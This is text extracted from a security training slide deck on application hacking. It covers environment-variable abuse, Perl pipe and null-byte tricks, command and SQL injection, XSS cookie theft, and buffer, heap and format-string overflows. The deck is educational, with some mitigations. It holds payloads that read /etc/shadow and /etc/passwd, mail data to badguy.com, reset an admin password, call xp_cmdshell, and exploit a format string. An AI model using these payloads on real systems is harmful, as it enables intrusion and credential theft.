Training Security EMEA - III docx

• Typical path deviation• Set PATH variable to include current directory • Write fake program • User will run the fake one if not using absolute path Case Study $ENV # export PATH=... •

Security Training

III – Application Hacking

Renaud BIDOU

• Applications target points

Agenda – Part II : Input data

Functional Components

INTRO

Environment

Variables

• Typical path deviation

• Set PATH variable to include current directory

• Write fake program

• User will run the fake one if not using absolute path

Case Study

$ENV

# export PATH=.

# ping gotcha

• What is IFS ?

• Defines separators

• Usually space, tab and carriage return

• Can be used to bypass PATH protection

• User will run the fake one if not using absolute path

PATH and IFS

$ENV

# export PATH=.

# export IFS="P\r\n"

# script.sh gotcha

• LD_PRELOAD

• Used to load shared libraries

• Can be used to load trojaned libraries

• May generate buffer overflows on target applications

• Used to load Java classes

• Can be wicked to load trojaned classes

• TMP

• Sets the temporary directory

• Useful for race conditions

Other variables at risk

$ENV

• Global deletion

• Under Linux set the **environ pointer to NULL

• Use the clearenv() function on POSIX systems

 May leave the system unstable

Mitigating the risk

• Selective deletion

• Function unsetenv()

• POSIX compliant

 More dangerous as all dangerous variables have to be unset

Mitigating the risk

&

Commands

• The PERL pipe

• Specific behavior of the PERL open function

• A script that opens a file which name is provided by user input

• User provides “mail hacker@badguy.com < cat /etc/shadow |”

• Gotcha !

Language Specificities

FILES

• The \0

• Is considered as a character by PERL

• Is the end of string for C

• Bypassing some security checks

• Ex: Displaying an HTML page based on user input

• PERL CGI application takes the input

• Adds “.html”

• Sends to a C program for processing

• User provides “/etc/passwd\0”

• CGI script sends “/etc/passwd\0.html” to C program

• C program handles “/etc/passwd”

Language Specificities

FILES

• ; && and ||

• Used to append multiple commands

• Can be inserted in a user input followed by a command

• The script will execute the command

• The HTML page asks for an IP to ping

• The CGI script will execute

• If the user provides “10.0.0.1;cat /etc/passwd”

Command Execution

COMMAND

• NEVER trust a user

• Filter all inputs

• Use an explicit authorized policy

• What is not authorized is forbidden

• List of authorized input may vary

• Reject invalid input

• Some scripts try to correct

Injections

• Objective

• Use input capabilities to have the remote software

• … display the input

• … execute the input

• … transmit the input to a third party application

• Use legitimate channels

• Hard to detect

• Few anomalies

Basics

INJECTION

• The HTML injection

• Common input channel

• HTML input field

• Text field through the GUI

• Other fields via HTTP proxy/editor

• Use URL parameters

• HTML Injection usage

• Mess the output

• Inject CSS-like load

• Have input executed by scripting languages

• php, asp, perl etc

• Classical test with <? phpinfo() ?>

• Inject malicious data into a database

• For further execution

• Links to insecure pages

Basics

INJECTION

• Example

• Injecting additional SQL command

• Original SQL request

• $data is provided by the user

• The user provides

• The SQL Database will execute

SQL Injection

INJECTION

SELECT * FROM table where x=$data

$data = 1; SELECT * FROM secret_table

SELECT * FROM table where x= 1; SELECT * FROM secret_table;

SELECT * FROM table where x=$data AND y=0

$data = 1; SELECT * FROM secret_table;

• Advanced techniques

• From a URL http://server/index.asp?id=$data

• Getting info on SQL structures 1 - Tables

• The command output is the name of the first table

• UNION with an integer (1) will generate an error

• Next table

SQL Injection

INJECTION

1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

converting the nvarchar value 'table1' to a column of data type int /index.asp, line 5

1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (‘table1’)

• Advanced techniques

• Getting info on SQL structures 2 - Columns

• The command output is the name of the first column

• UNION with an integer (1) will generate an error

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error

converting the nvarchar value 'login_id' to a column of data type int /index.asp, line 5

• Other possibilities

• Once the database structure is known

• Inserting data

• Leverage the power of the attack

• With stored procedure

• With embedded database shell access

SQL Injection

INJECTION

1; UPDATE ‘table1’ SET password=‘toto’ where login=‘admin’

'; exec master xp_cmdshell 'ping

10.10.1.2' • Basics

• Technology

• Originaly based on JavaScript

• Applicable to any client scripting language, including HTML…

• Have code executed with user credential

• In order to

• Transmit user private data, mainly cookies

 Session cookies are used for authentication

• Use user credential to perform operations

Cross Site Scripting

INJECTION

• Stealing cookies

1 Own a web server – badguy.com in the example

2 Have the following code injected by the target user

3 Get the cookie in the values variable of the cookies.cgi script

Cross Site Scripting

• Stealing cookies in hexa

• To make human detection difficult

• The same than on the preceding page

Cross Site Scripting

• Use target credentials

• Have the following code injected on the target user

• He will use his rights to change his password

Internal Parts

Reminder

Memory organization

REMINDER

• Dynamic variables declared within functions

• Automatic local variables

• argv, argc etc

• Saves CPU operation

• EBP register on x86 architectures

Stack

BSS Data Text

Highest @

Lowest @

REMINDER

• Save arguments in the stack ($2,$3)

• Save return address in the stack (ret)

• Save frame pointer – EBP in the stack (sfp)

• Copy ESP in EBP

void main() {

fonction(1,2);

}

push $2 push $3 call fonction

$2

$3ret (eip)sfp (ebp)buf1buf2

Buffer Overflows

BOF

• Find a way to change the return address

• Have it point on another function

• A shell is a good one…

• If the corrupted process has root privileges …

• Run by root

• Or thanks to suid bit

 ROOTSHELL

Reaching the EIP

BOF

• Vulnerable code

• Compiles but generate segmentation fault upon execution

• You just started to scramble the SFP!

buf1

A B C

Injecting redirection

BOF

• Shellcode after the modified EIP

• Easy to find the new address to point on

• Architecture independent

• Makes the environment instable

• Dirty

• Shellcode in the buffer

• Need a buffer that is large enough

• Global schema

• Filling the buffer

• NOP padding (0x90 instruction) - N

buffer

FF

F0 EB

E2 D8

0x01 0x02

0xD8 NNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS

Heap Overflow

Injecting redirection

HEAP

• Overflow is used to corrupt a function pointer

• Applied to the vfptr of an adjacent function

VTABLE PTR member vars

VTABLE PTR

_destructor _vfptr

@fake_vfptr

Format String

FORMAT

• Change the return address of a function

• Have it point on a shellcode

• Use %x and %n formatting directives

• %x is used to perform hexadecimal conversion

• %n the number of characters formatted

n = 10

%x format

FORMAT

• If values are not specified in snprintf() arguments, it uses the

next byte in the stack!

len(buffer)

argv[1]

\x00\x03\x02\x01

buffer

%n format

FORMAT

• If values are not specified in snprintf() arguments, it uses the

next byte in the stack, to WRITE the result!

# perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'

i=1 ret (eip)